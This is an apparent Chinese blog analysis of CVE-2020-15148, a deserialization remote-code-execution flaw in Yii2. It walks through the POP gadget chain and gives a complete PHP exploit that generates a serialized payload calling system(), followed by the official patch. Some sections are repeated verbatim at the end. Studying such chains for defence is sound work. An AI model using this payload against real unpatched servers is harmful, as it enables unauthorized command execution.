Yii2反序列化RCE漏洞分析（CVE-2020-15148）<\/h1>

漏洞概述<\/h2>
CVE-2020-15148是Yii2框架中存在的一个反序列化远程代码执行漏洞，影响Yii2版本低于2.0.38的应用程序。该漏洞通过精心构造的反序列化链（POP链）可实现任意代码执行。<\/p>

影响范围<\/h2>

Yii2版本 < 2.0.38<\/li> <\/ul>

环境搭建<\/h2>

下载受影响版本的Yii2（如yii-basic-app-2.0.37.tgz）<\/li>
解压到Web目录<\/li>
修改配置文件\/config\/web.php<\/code>，设置cookieValidationKey<\/code>字段值<\/li>

添加一个存在漏洞的Action控制器\/controllers\/TestController.php<\/code><\/li>
<\/ol>
漏洞分析<\/h2>
反序列化起点<\/h3>
漏洞利用链从yii\db\BatchQueryResult<\/code>类开始，该类没有__wakeup()<\/code>方法但存在__destruct()<\/code>方法：<\/p>
namespace<\/span> yii\db<\/span>;
<\/span><\/span>
<\/span><\/span>class<\/span> BatchQueryResult<\/span> {
<\/span><\/span>    public<\/span> function<\/span> __destruct() {
<\/span><\/span>        $this-><\/span>reset<\/span>();
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    public<\/span> function<\/span> reset<\/span>() {
<\/span><\/span>        if<\/span> ($this-><\/span>_dataReader<\/span> !==<\/span> null<\/span>) {
<\/span><\/span>            $this-><\/span>_dataReader<\/span>-><\/span>close<\/span>();
<\/span><\/span>        }
<\/span><\/span>        \/\/ ...其他清理代码...
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>关键跳板<\/h3>
reset()<\/code>方法中$this->_dataReader->close()<\/code>调用是关键，攻击者可控制_dataReader<\/code>属性，使其指向一个具有__call()<\/code>魔术方法的对象。<\/p>
利用Faker\Generator类<\/h3>
Faker\Generator<\/code>类的__call()<\/code>方法提供了进一步利用的可能：<\/p>
namespace<\/span> Faker<\/span>;
<\/span><\/span>
<\/span><\/span>class<\/span> Generator<\/span> {
<\/span><\/span>    public<\/span> function<\/span> format<\/span>($formatter, $arguments =<\/span> array<\/span>()) {
<\/span><\/span>        return<\/span> call_user_func_array<\/span>($this-><\/span>getFormatter<\/span>($formatter), $arguments);
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    public<\/span> function<\/span> __call($method, $attributes) {
<\/span><\/span>        return<\/span> $this-><\/span>format<\/span>($method, $attributes);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>当调用不存在的方法（如close()<\/code>）时，会触发__call()<\/code>，进而调用format()<\/code>方法，最终执行call_user_func_array()<\/code>。<\/p>
最终执行点<\/h3>
利用yii\rest\CreateAction::run()<\/code>方法实现代码执行：<\/p>
namespace<\/span> yii\rest<\/span>;
<\/span><\/span>
<\/span><\/span>class<\/span> CreateAction<\/span> {
<\/span><\/span>    public<\/span> function<\/span> run<\/span>() {
<\/span><\/span>        if<\/span> ($this-><\/span>checkAccess<\/span>) {
<\/span><\/span>            call_user_func<\/span>($this-><\/span>checkAccess<\/span>, $this-><\/span>id<\/span>);
<\/span><\/span>        }
<\/span><\/span>        \/\/ ...其他代码...
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>$this->checkAccess<\/code>和$this->id<\/code>都可控，因此可以实现任意命令执行。<\/p>
完整利用链<\/h2>

yii\db\BatchQueryResult::__destruct()<\/code><\/li>
yii\db\BatchQueryResult::reset()<\/code><\/li>
Faker\Generator::__call()<\/code>（通过close()<\/code>方法调用触发）<\/li>
Faker\Generator::format()<\/code><\/li>
yii\rest\CreateAction::run()<\/code><\/li>
call_user_func($this->checkAccess, $this->id)<\/code>（执行任意命令）<\/li>
<\/ol>
EXP示例<\/h2>
<?<\/span>php<\/span>
<\/span><\/span>namespace<\/span> yii\rest<\/span>{
<\/span><\/span>    class<\/span> CreateAction<\/span>{
<\/span><\/span>        public<\/span> $checkAccess;
<\/span><\/span>        public<\/span> $id;
<\/span><\/span>
<\/span><\/span>        public<\/span> function<\/span> __construct(){
<\/span><\/span>            $this-><\/span>checkAccess<\/span> =<\/span> 'system'<\/span>;
<\/span><\/span>            $this-><\/span>id<\/span> =<\/span> 'ls -al'<\/span>;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> Faker<\/span>{
<\/span><\/span>    use<\/span> yii\rest\CreateAction<\/span>;
<\/span><\/span>
<\/span><\/span>    class<\/span> Generator<\/span>{
<\/span><\/span>        protected<\/span> $formatters;
<\/span><\/span>
<\/span><\/span>        public<\/span> function<\/span> __construct(){
<\/span><\/span>            $this-><\/span>formatters<\/span>['close'<\/span>] =<\/span> [new<\/span> CreateAction<\/span>, 'run'<\/span>];
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> yii\db<\/span>{
<\/span><\/span>    use<\/span> Faker\Generator<\/span>;
<\/span><\/span>
<\/span><\/span>    class<\/span> BatchQueryResult<\/span>{
<\/span><\/span>        private<\/span> $_dataReader;
<\/span><\/span>
<\/span><\/span>        public<\/span> function<\/span> __construct(){
<\/span><\/span>            $this-><\/span>_dataReader<\/span> =<\/span> new<\/span> Generator<\/span>;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span>{
<\/span><\/span>    echo<\/span> base64_encode<\/span>(serialize<\/span>(new<\/span> yii\db\BatchQueryResult<\/span>));
<\/span><\/span>}
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>修复方案<\/h2>

升级Yii2到2.0.38或更高版本<\/li>
官方修复方式是为BatchQueryResult<\/code>类添加__wakeup()<\/code>方法，禁止反序列化该类：<\/li>
<\/ol>
public<\/span> function<\/span> __wakeup()
<\/span><\/span>{
<\/span><\/span>    throw<\/span> new<\/span> \LogicException<\/span>('BatchQueryResult cannot be serialized.'<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>总结<\/h2>
该漏洞利用Yii2框架中多个类的魔术方法和回调机制，通过精心构造的反序列化链实现了远程代码执行。理解这种POP链的构造方式对于防御类似漏洞具有重要意义。<\/p>

Yii2反序列化RCE漏洞分析（CVE-2020-15148）<\/h1>

漏洞概述<\/h2> CVE-2020-15148是Yii2框架中存在的一个反序列化远程代码执行漏洞，影响Yii2版本低于2.0.38的应用程序。该漏洞通过精心构造的反序列化链（POP链）可实现任意代码执行。<\/p>

漏洞分析<\/h2>

关键跳板<\/h3> reset()<\/code>方法中$this->_dataReader->close()<\/code>调用是关键，攻击者可控制_dataReader<\/code>属性，使其指向一个具有__call()<\/code>魔术方法的对象。<\/p>

总结<\/h2> 该漏洞利用Yii2框架中多个类的魔术方法和回调机制，通过精心构造的反序列化链实现了远程代码执行。理解这种POP链的构造方式对于防御类似漏洞具有重要意义。<\/p>

漏洞概述<\/h2>
CVE-2020-15148是Yii2框架中存在的一个反序列化远程代码执行漏洞，影响Yii2版本低于2.0.38的应用程序。该漏洞通过精心构造的反序列化链（POP链）可实现任意代码执行。<\/p>

关键跳板<\/h3>
`reset()<\/code>方法中$this->_dataReader->close()<\/code>调用是关键，攻击者可控制_dataReader<\/code>属性，使其指向一个具有__call()<\/code>魔术方法的对象。<\/p>`

总结<\/h2>
该漏洞利用Yii2框架中多个类的魔术方法和回调机制，通过精心构造的反序列化链实现了远程代码执行。理解这种POP链的构造方式对于防御类似漏洞具有重要意义。<\/p>